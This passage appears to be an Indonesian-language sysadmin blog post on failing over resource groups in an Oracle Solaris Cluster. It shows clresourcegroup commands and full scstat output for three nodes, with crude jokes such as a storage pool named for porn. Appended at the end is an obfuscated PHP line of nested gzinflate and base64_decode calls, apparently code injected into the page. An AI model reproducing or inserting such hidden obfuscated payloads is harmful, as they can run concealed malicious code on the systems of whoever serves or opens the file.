  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

sampai sini tinggal pindah2 resource group ke Monyet-Monyet yg laen ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

atau mau di balikin ulang :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET

tinggal isi pelem di poolBOKEP dah \:d/

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>